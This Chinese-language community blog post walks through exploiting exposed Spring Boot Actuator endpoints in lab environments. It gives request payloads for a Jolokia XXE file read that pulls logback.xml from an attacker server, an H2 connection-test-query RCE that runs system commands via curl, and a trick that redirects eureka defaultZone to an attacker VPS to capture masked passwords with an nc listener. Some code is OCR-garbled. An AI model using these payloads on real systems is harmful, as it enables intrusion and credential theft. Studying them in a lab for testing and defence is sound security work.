AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

16 spring boot漏洞利用

2022-12-27 629
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开箱即用的模块,如:Spring JDBC、Spring MVC、Spring Security.Spring AOP、Spring ORM、Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早期阶段,我们需要编写大量的代码来将记录插入到数据库中。但是通过使用Spring JDBC模块的JDBCTemplate,我们可以将操作简化为几行代码。|

Spring Boot是Pivotal团队在Spring的基础上提供的一套全新的开源框架,其目的是为了简化Spring应用的搭建和开发过程。Actuator是SpringBoot自带监控功能Actuator,可以帮助实现对程序内部运行情况监控,比如监控状况、Bean加载情况、环境变量、日志信息、线程信息等

界面特征
/evn
绿色小树叶

常见端口

实际案例
1.x版本http://ip:port/env
2.X版本http://ip:port/actuator/env

环境搭建
https://github.com/veracode-research/actuator-testbed

  • mvn install
  • mvn spring-boot:run

如何安装mvn(maven)? apt install mvn / yum install maven如何更改mvn源?https://www.cnblogs.com/shunzi115/p/12521630.html

如何使用mvn?
https://www.runoob.com/maven/maven-tutorial.html

批量扫描
https://github.com/rabbitmask/SB-Actuator

漏洞利用——jolokia XXE任意文件读取
是否存在

image.png

漏洞利用攻击机
logback.xml
image.png

fileread.dtd
image.png

python3 -m http.server 8989

http://139.198.109.12:8090/olokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.,jmx.
JMXConfigurator/reloadByURL/http://47.115.9.13:8000!/logback.xml
注意修改攻击机的ip和端口

漏洞利用——rce spring-boot-actuator-h2-rce
-漏洞环境搭建
git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git
['git连接不上就下载再复制]
cd spring-boot-actuator-h2-rce
docker build -t spaceraccoon/spring-boot-rce-lab.
docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab

浏览器访问

对/actuator/env发POST包

("name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String
shellexec(String cmd) throws java.io.IOException ( java.util.Scanner s = new
java.util.Scanner(Runtime.getRuntime().exec(cmd).getlnputStream()); if (s.hasNext()) (return s.next();} throw
new lllegalArgumentException():)'; CALL EXEC('curl ');"

对/actuator/restart 发POST包

burp自带dnslog平台
image.png

image.png

查看burp的dnslog平台,可以查看到解析记录

image.png

可以执行系统命令

漏洞利用——env敏感信息脱星
漏洞简介
访问/env 接口时,spring actuat&会将一些带有敏感关键词(如password、secret)的属性名对应的属性值用*号替换达到脱敏的效果
GET请求目标网站的/env或/actuator/env 接口,搜索*关键词,找到想要获取的被星号遮掩的属性值对应的属性名。

脱星:网页上一些铭感信息会打上*号

-漏洞利用

spring 1.x:
POST /env
Content-Type: application/x-www-form-urlencoded
eureka.client.serviceUri.defaultZone=http://value:S(security.user.password}@your-vps-ip
spring 2.x:
POST /actuator/env
Content-Type: application/json
("name":"eureka.client.serviceUrl.defaultZone","value":"http://value:S{security.user.password}@your-vps-ip"}

抓取接口信息 修改为post 修改值
image.png

image.png

刷新配置

image.png
image.png

攻击机监听端口: nc -lvvp 8000 将Basic base64解码 即可得到明文
base64解密:
image.png

文章标签:
Java
Python
开发工具
监控
Spring
git
Maven
安全
数据格式
数据库连接
关键词:
Spring Boot漏洞
Spring漏洞
1227507367497292
目录
相关文章
Tom弹架构
|
安全 Java 开发者
刚折腾完Log4J,又爆Spring RCE核弹级漏洞
继Log4J爆出安全漏洞之后,又在深夜,Spring的github上又更新了一条可能造成RCE(远程命令执行漏洞)的问题代码,随即在国内的安全圈炸开了锅。有安全专家建议升级到JDK 9以上,有些专家又建议回滚到JDK 7以下,一时间小伙伴们不知道该怎么办了。大家来看一段动画演示,怎么改都是“将军"。
Tom弹架构
134 1
卢衍飞
|
Prometheus 监控 安全
SpringBoot Actuator未授权访问漏洞的解决方法
SpringBoot Actuator未授权访问漏洞的解决方法Actuator 是 SpringBoot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。
卢衍飞
25009 0
最好zzz
|
5月前
|
存储 安全 Java
发现 XSS 漏洞?别急!SpringBoot这招轻松搞定!
在SpringBoot中,发现XSS(跨站脚本)漏洞时,可以通过一系列措施来轻松搞定这些安全问题。XSS攻击允许攻击者在受害者的浏览器中注入恶意脚本,这些脚本可以窃取用户的敏感信息、劫持用户会话或进行其他恶意操作。以下是一些在SpringBoot中修复XSS漏洞的有效方法
最好zzz
915 7
李火火
|
开发框架 安全 Java
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。
李火火
517 1
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
天落色
|
SQL XML JSON
Springboot 的这些漏洞你了解吗?在使用中一定要注意!!
Springboot 的这些漏洞你了解吗?在使用中一定要注意!!
天落色
4905 0
乌鸦巳隐居
|
存储 安全 前端开发
springboot下xss漏洞的修复
还有很多修复方式,比如可以利用springcloud gateway进行过滤,但是主要应用本身也要进行加固,网关只能过滤外部威胁
乌鸦巳隐居
690 0
乌鸦安全
|
监控 安全 IDE
Springboot Actuator未授权访问漏洞复现
Springboot Actuator未授权访问漏洞复现
乌鸦安全
2643 0
ckcsec
|
安全 Java Serverless
Spring Cloud Function SPEL 远程命令执行漏洞
Spring Cloud Function SPEL 远程命令执行漏洞
ckcsec
506 0
码农飞哥
|
SQL 安全 前端开发
如何预防SQL注入,XSS漏洞(spring,java)
SQL注入是由于程序员对用户输入的参数没有做好校验,让不法分子钻了SQL的空子,
码农飞哥
362 0
游客du62snpusmjeg
|
安全 IDE Java
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
游客du62snpusmjeg
458 0
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查

热门文章

最新文章

  • 1
    2025春招,Spring 面试题汇总
  • 2
    AI 时代:从 Spring Cloud Alibaba 到 Spring AI Alibaba
  • 3
    对Spring、SpringMVC、MyBatis框架的介绍与解释
  • 4
    Spring之定时任务基本使用篇
  • 5
    Spring IOC—基于注解配置和管理Bean 万字详解(通俗易懂)
  • 6
    Spring AOP—通知类型 和 切入点表达式 万字详解(通俗易懂)
  • 7
    Spring AOP—深入动态代理 万字详解(通俗易懂)
  • 8
    Spring底层架构核心概念解析
  • 9
    Spring 手动实现Spring底层机制
  • 10
    使用Java和Spring Data构建数据访问层
  • 1
    基于SpringBoot+Vue的精准扶贫管理系统的设计与实现(源码+lw+部署文档+讲解等)
    104
  • 2
    基于SpringBoot+Vue的大型商场应急预案管理系统的设计与实现(源码+lw+部署文档+讲解等)
    80
  • 3
    基于SpringBoot+Vue的网上摄影工作室的设计与实现(源码+lw+部署文档+讲解等)
    82
  • 4
    基于SpringBoot+Vue的大学生竞赛管理系统的设计与实现(源码+lw+部署文档+讲解等)
    123
  • 5
    基于SpringBoot+Vue的学生宿舍信息的系统的设计与实现(源码+lw+部署文档+讲解等)
    45
  • 6
    基于SpringBoot+Vue的酒店客房管理系统的设计与实现(源码+lw+部署文档+讲解等)
    101
  • 7
    基于SpringBoot+Vue的安康旅游网站的设计与实现(源码+lw+部署文档+讲解等)
    62
  • 8
    基于SpringBoot+Vue的创新创业教育中心项目申报管理系统的设计与实现(源码+lw+部署文档+讲解等)
    82
  • 9
    基于SpringBoot+Vue的中小企业设备管理系统的设计与实现(源码+lw+部署文档+讲解等)
    66
  • 10
    基于SpringBoot+Vue的学生评奖评优管理系统的设计与实现(源码+lw+部署文档+讲解等)
    60

    • 相关课程

    更多
  • SpringBoot快速掌握 - 核心技术
  • SpringBoot快速掌握 - 高级应用
  • Java Web开发系列课程 - Spring框架入门
  • Spring Boot 2.5.x开发实战
  • Springboot项目云开发快速迁移
  • Spring Cloud微服务架构设计与开发实战

    • 相关电子书

    更多
  • 云栖社区特邀专家徐雷Java Spring Boot开发实战系列课程(第20讲):经典面试题与阿里等名企内部招聘求职面试技巧
  • 微服务架构模式与原理Spring Cloud开发实战
  • 阿里特邀专家徐雷Java Spring Boot开发实战系列课程(第18讲):制作Java Docker镜像与推送到DockerHub和阿里云Docker仓库

    • 相关实验场景

    更多
  • 从零搭建Spring Boot的Hello World
    • 下一篇
    PAI Model Gallery 支持云上一键部署 DeepSeek-V3、DeepSeek-R1 系列模型